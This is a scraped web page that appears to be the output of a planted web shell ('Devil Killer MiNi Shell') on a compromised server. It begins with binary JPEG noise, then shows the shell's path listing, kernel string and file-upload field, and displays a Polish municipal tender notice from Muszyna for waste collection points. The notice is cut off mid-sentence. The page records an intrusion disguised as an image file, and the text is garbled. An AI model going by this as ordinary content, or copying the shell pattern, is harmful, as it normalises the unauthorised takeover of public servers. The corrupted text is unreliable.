JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221212/0049076501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa utworzenia i prowadzenia 2pkt selektywnego zbierania odp.kom.od 1.01.23r-31.12.25r któreobejmuje świadczenie usługprzyjmowaniaw PSZOK odp.kom.od wł. nieruchomości i zag.odp.kom.zebranych wPSZOK </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Uzdrowiskowa Muszyna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893061</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Muszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">184714009</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muszyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muszyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa utworzenia i prowadzenia 2pkt selektywnego zbierania odp.kom.od 1.01.23r-31.12.25r któreobejmuje świadczenie usługprzyjmowaniaw PSZOK odp.kom.od wł. nieruchomości i zag.odp.kom.zebranych wPSZOK </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6ee5a4f4-7a1c-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00490765</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021901/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.22 Prowadzenie punktów selektywnego zbierania odpadów komunalnych (PSZOK) na terenie Miasta i Gminy Uzdrowiskowej Muszyna (2023r.-2025r.)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/muszyna <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/muszyna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, tj. za pośrednictwem dedykowanego formularza dostępnego na platformie zakupowej. <br/>2. Zamawiający (w sytuacjach awaryjnych, np. w przypadku niedziałania platformy zakupowej) dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, email: przetargi@muszyna.pl, zwietecha@muszyna.pl.<br/>3. Sposób sporządzenia dokumentów elektronicznych oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. <br/>4. Komunikacja poprzez Wyślij wiadomość umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników). Występuje limit objętość plików lub spakowanego katalogu w zakresie całej wiadomości do 1 GB. <br/>5. Wykonawca otrzyma powiadomienia tj. wiadomość email dotyczącą komunikatów w sytuacji gdy Zamawiający opublikuje wiadomości publiczne/komunikaty publiczne lub spersonalizowaną wiadomość zwaną wiadomością prywatną. <br/>Szczegółowe wymagania dot. korespondencji elektronicznej określono w Rozdziale I,Podrozdział 12 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych jest Miasto i Gmina Uzdrowiskowa Muszyna, ul. Rynek 31, 33-370 Muszyna.<br/>2. Miasto i Gmina Uzdrowiskowa Muszyna wyznaczyła Inspektora Ochrony Danych Panią Dorotę Sadowską. Kontakt z Inspektorem możliwy jest przez <br/>e-mail: rodo@muszyna.pl. <br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr Zp.271.47.2022.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18-19 ustawy. <br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy. <br/>7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>8. Posiadają Państwo: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO. <br/>9. Nie przysługuje Państwu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">− Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>− Na mocy art. 19 ust. 3 ustawy wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp.271.47.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa utworzenia i prowadzenia punktów selektywnego zbierania odpadów komunalnych (PSZOK) na terenie Miasta i Gminy Uzdrowiskowej Muszyna.<br/>Zakres usług:<br/>1. Utworzenie i prowadzenie dwóch stacjonarnych punktów do selektywnego zbierania odpadów komunalnych na terenie Miasta i Gminy Uzdrowiskowej Muszyna, w tym, co najmniej jeden na terenie miasta Muszyna,<br/>2. Przyjmowanie od mieszkańców Miasta i Gminy Uzdrowiskowej Muszyna w punktach, o których mowa w pkt 1 odpadów komunalnych określonych w tabeli wskazanej w SWZ, ich transport oraz zagospodarowanie poprzez przekazanie podmiotowi uprawnionemu do ich zagospodarowania lub w inny sposób zgodny z obowiązującymi aktualnie przepisami prawa, zgodnie z warunkami określonymi w niniejszej SWZ:<br/>WYKONAWCA PONOSI KOSZTY ZAGOSPODAROWANIA ODPADÓW OKREŚLONYCH W TABELI WSKAZANEJ W SWZ ;<br/>3)	prowadzenie ewidencji ilościowej i rodzajowej odpadów przekazywanych do uprawnionych podmiotów;<br/>4)	obowiązkowe prowadzenie dokumentacji, w tym sprawozdawczości;<br/>5)	stały kontakt z Zamawiającym wraz z wzajemną wymianą korespondencji oraz odpowiadanie w terminie wyznaczonym przez Zamawiającego na zapytania przekazywane przez Zamawiającego w temacie usługi objętej niniejszym zamówieniem;<br/>6)	wykonywanie innych prac i czynności niezbędnych do należytego wykonania przedmiotu zamówienia;<br/>7)	przyjmowanie odpadów komunalnych od mieszkańców Miasta i Gminy Uzdrowiskowej Muszyna do punktów selektywnego zbierania odpadów komunalnych obowiązywać będzie od 1 stycznia 2023 r.;<br/>8)	punkty do selektywnego zbierania odpadów komunalnych muszą być utworzone przez Wykonawcę, na co najmniej 7 dni przed 1 stycznia 2023r.;<br/>9)	nieutworzenie, co najmniej dwóch stacjonarnych PSZOK w terminie, o którym mowa w pkt 8 skutkować będzie wypowiedzeniem, rozwiązaniem lub odstąpieniem od umowy przez Zamawiającego oraz naliczeniem kar umownych przewidzianych z tytułu odstąpienia od umowy przez Zamawiającego z przyczyn leżących po stronie Wykonawcy;<br/>10)	od dnia zawarcia umowy Zamawiający zastrzega sobie możliwość weryfikacji postępów prac związanych z uruchomieniem PSZOK;<br/>11)	wszystkie koszty związane z przygotowaniem do funkcjonowania PSZOK-ów Wykonawca powinien ująć w kalkulacji ceny.<br/>Warunki realizacji zamówienia<br/>1)	Wykonawca zapewni, aby stacjonarne punkty do selektywnego zbierania odpadów komunalnych były utworzone:<br/>a)	na terenie, do którego Wykonawca ma tytuł prawny, na którym zlokalizowane zostaną stacjonarne punkty do selektywnego zbierania odpadów komunalnych o powierzchni min 500 m²,<br/>b)	w odległości między nimi, co najmniej 4 km w linii prostej, <br/>c)	zgodnie z przepisami prawa budowlanego, ochrony środowiska, przepisami BHP i ppoż oraz o zagospodarowaniu przestrzennym, w tym z zapisami Miejscowego Planu Zagospodarowania Przestrzennego,<br/>d)	na powierzchni dostosowanej do ilości zbieranych odpadów na terenie utwardzonym, skanalizowanym (zapewniającym odprowadzanie wód opadowych i roztopowych), ogrodzonym, oświetlonym oraz dozorowanym;<br/>2)	magazynowanie zebranych odpadów należy prowadzić zgodnie z obowiązującymi przepisami prawnymi dla poszczególnych rodzajów odpadów;<br/>3)	Wykonawca uprawniony jest uzależnić przyjęcie odpadów od wykazania przez mieszkańców faktu zamieszkania na terenie Miasta i Gminy Uzdrowiskowej Muszyna poprzez np. okazanie dowodu osobistego;<br/>4)	Wykonawca zobowiązany jest do uzyskania zezwolenia na zbieranie odpadów w zakresie objętym przedmiotem zamówienia zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (t.j.Dz. U. z 2022 r. poz. 699)), dalej zwaną Ustawą o odpadach najpóźniej do dnia 01.01.2023 r.; <br/>5)	Zamawiający zastrzega, że po zakończeniu umowy Wykonawca nie może wnosić o zwrot nakładów poniesionych w związku z utworzeniem, prowadzeniem i likwidacją PSZOK;<br/>6)	Wykonawca opracuje i zatwierdzi u Zamawiającego Regulamin korzystania z Punktów Selektywnego Zbierania Odpadów Komunalnych. Regulamin należy umieścić w widocznym miejscu w PSZOK;<br/>7)	Wykonawca zapewni, aby:<br/>•	PSZOK-i były czynne:<br/>- PSZOK na terenie miasta Muszyna: wtorek i czwartek w godzinach od 8.00 do 15.00 oraz w sobotę od 8.00 do 13.00 (od 01.01.2023 r. do 31.12.2025 r.),<br/>- PSZOK na terenie gminy Muszyna a poza terenem miasta Muszyna: poniedziałek, środa, piątek w godzinach od 8.00 do 15.00 (od 01.01.2023 r. do 31.12.2025 r.),<br/>•	w punktach do selektywnego zbierania odpadów komunalnych była usługa związaną z wydawaniem worków z przeznaczeniem na odpady zbierane selektywnie,<br/>•	w punktach do selektywnego zbierania odpadów komunalnych prowadzony był rejestr przyjmowanych odpadów z podziałem na rodzaj odpadu,<br/>•	bioodpady wywożone były na bieżąco do kompostowni,<br/>•	w punktach do selektywnego zbierania odpadów komunalnych była ścisła ewidencja odpadów.<br/>8) na Wykonawcy spoczywa obowiązek udokumentowania prawidłowości postępowania z odpadami oraz ilości odpadów odebranych i przekazanych do uprawnionych podmiotów. Zamawiający zastrzega sobie prawo dochodzenia od wykonawcy dokumentów lub innych dowodów uwierzytelniających ilości odpadów i potwierdzających właściwe z nimi gospodarowanie, w tym m.in. dokumentów poświadczających legalizację wag, na których ważone są odpady, dokumentów księgowych wystawianych w toku realizacji usługi, dokumentów poświadczających, że podmioty, do których kierowane są odpady, posiadają uprawnienia wymagane właściwymi przepisami prawa;<br/>9)	Wykonawca ma obowiązek wyposażenia pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo firmy. Odzież winna być utrzymana w należytej czystości;<br/>10)	pracownicy obsługujący PSZOK-i muszą być przeszkoleni w zakresie właściwego postępowania z odpadami, oraz winni odznaczać się kulturą osobistą, umiejętnością komunikowania się w zakresie swych obowiązków oraz dbać o właściwe relacje pomiędzy wykonawcą a wytwórcami odpadów;<br/>11)	przedmiot zamówienia należy realizować zgodnie z obowiązującymi aktami prawnymi określającymi zasady utrzymania czystości i porządku w gminach oraz zasadami postępowania z odpadami (ustawa o utrzymaniu czystości i porządku w gminach, ustawa o odpadach, ustawa o zużytym sprzęcie elektrycznym i elektronicznym, ustawa o bateriach i akumulatorach) oraz obowiązującymi uchwałami Rady Miasta i Gminy Uzdrowiskowej Muszyna w tym zakresie;<br/>12)	Wykonawca wskaże osobę odpowiedzialną za realizację zadania oraz poda maila i nr telefonu do kontaktu do tej osoby, w terminie 7 dni po podpisaniu umowy.<br/> <br/><br/>Warunki rozliczenia przedmiotu zamówienia<br/>1)	Zamawiający zapłaci wykonawcy wynagrodzenie za faktyczne ilości przyjętych odpadów od mieszkańców Miasta i Gminy Uzdrowiskowej Muszyna i przekazanie ich do zagospodarowania do odpowiednich instalacji oraz ryczałtową stawkę za prowadzenie PSZOK;<br/>2)	rozliczenie będzie następować miesięcznie na podstawie cen jednostkowych za ilości poszczególnych odpadów oraz ryczałtowej ceny miesięcznego utrzymania punktów selektywnego zbierania odpadów komunalnych;<br/>3)	faktura powinna zawierać ilość i rodzaj odpadu oraz jego cenę jednostkową;<br/>4)	na potwierdzenie faktycznej ilości przyjętych odpadów będą karty przekazania odpadów stanowiące załącznik do faktury;<br/>5)	faktury będą płatne w terminie 30 dni od daty ich wystawienia;<br/>6)	ceny jednostkowe odpadów uwzględniają koszty ich zagospodarowania. Koszty te ponosi Wykonawca;<br/>7)	Zamawiający zastrzega sobie prawo wstrzymania wypłaty wynagrodzenia lub odmowy jego wypłaty w przypadku, gdy dokumenty przedstawione przez Wykonawcę w celu potwierdzenia ilości odpadów będą budziły uzasadnione wątpliwości, co do autentyczności danych w tych dokumentach przedstawionych w zakresie pochodzenia odpadów, ich ilości lub prawidłowości postępowania z odpadami;<br/><br/>Informacje dodatkowe dotyczące przedmiotu zamówienia:<br/>a)	Liczba mieszkańców zameldowanych na terenie Miasta i Gminy Uzdrowiskowej Muszyna na dzień 1 stycznia 2022 wynosi 11 529 osób.<br/>b)	Ilość osób zamieszkałych na terenie MiGU Muszyna na podstawie złożonych deklaracji dotyczących gospodarowania odpadami wynosi około 8600 osób.<br/>c)	Powierzchnia gminy wynosi: 141 km²<br/>d)	obszar Gminy Muszyna podzielony jest na Miasto Muszyna i 10 sołectw: Powroźnik, Wojkowa, Jastrzębik, Złockie, Szczawnik, Andrzejówka, Milik, Żegiestów, Leluchów i Dubne.<br/>e)	Wykonawca jest zobowiązany do wykonywania przedmiotu umowy w sposób fachowy, nie powodujący niepotrzebnych przeszkód oraz ograniczający niedogodności dla społeczeństwa do niezbędnego minimum.<br/>f)	Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy. W przypadku wystąpienia jakichkolwiek zniszczeń, zobowiązany jest na własny koszt do usunięcia szkody bez zbędnej zwłoki.<br/> <br/>Zamawiający wymaga zatrudnienia osób na umowę o pracę przy wykonywaniu przedmiotu zamówienia. Szczegółowe wymagania określono w SWZ i załączniku nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511200-4 - Usługi gromadzenia odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">63122000-0 - Usługi magazynowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę – 60 pkt<br/>b)	Kryterium nr 2: Okres gwarancji zaoferowany w ofercie – 40 pkt<br/>19.3	Punkty przyznawane za kryterium „Cena oferty (z podatkiem VAT)” oraz „Okres gwarancji zaoferowany w ofercie” będą liczone wg następującego wzoru:<br/>Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę <br/>Wzór: C = [( Cn/Cb)*60]<br/>C – łączna liczba punktów otrzymanych za kryterium cena brutto<br/>Cn – cena najniższa brutto<br/>Cb – cena wynikająca z oferty badanej brutto<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/><br/>Kryterium nr 2: Standardy środowiskowe (Wśrodowisko)<br/>Zamawiający określi wartość punktową ofert w następujący sposób:<br/>a)	za dysponowanie pojazdem specjalnie przystosowanym do odbioru selektywnie zebranych odpadów komunalnych z dźwignią hakową (hakowiec), spełniającym wymagania normy emisji spalin co najmniej Euro 3 – 0 pkt.<br/>b)	za dysponowanie pojazdem specjalnie przystosowanym do odbioru selektywnie zebranych odpadów komunalnych z dźwignią hakową (hakowiec), spełniającym wymagania normy emisji spalin co najmniej Euro 4 – 20 pkt.<br/>c)	za dysponowanie pojazdem specjalnie przystosowanym do odbioru selektywnie zebranych odpadów komunalnych z dźwignią hakową (hakowiec), spełniającym wymagania normy emisji spalin co najmniej Euro 5 lub 6 – 40 pkt.<br/>Dokumenty potwierdzające spełnianie powyższego warunku:<br/>-	dowód rejestracyjny zawierający adnotację potwierdzającą spełnianie przez pojazd normy dotyczącej poziomu emisji spalin lub<br/>-	w przypadku braku ww. adnotacji w dowodzie rejestracyjnym – dowód rejestracyjny oraz wyciąg świadectwa homologacji lub zgodności homologacji.<br/>3.	Sumaryczna liczba punktów oferty będzie obliczona według poniższego wzoru:<br/>W = Wcena + Wśrodowisko<br/>gdzie:<br/>W – sumaryczna liczba punktów oferty badanej<br/>Wcena – wartość punktowa wyznaczona w kryterium ceny<br/>Wśrodowisko – wartość punktowa wyznaczona w kryterium standardu środowiskowego<br/><br/>Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+G<br/>P – ostateczna liczba punktów<br/>C - liczba punktów otrzymana za kryterium cena brutto<br/>G 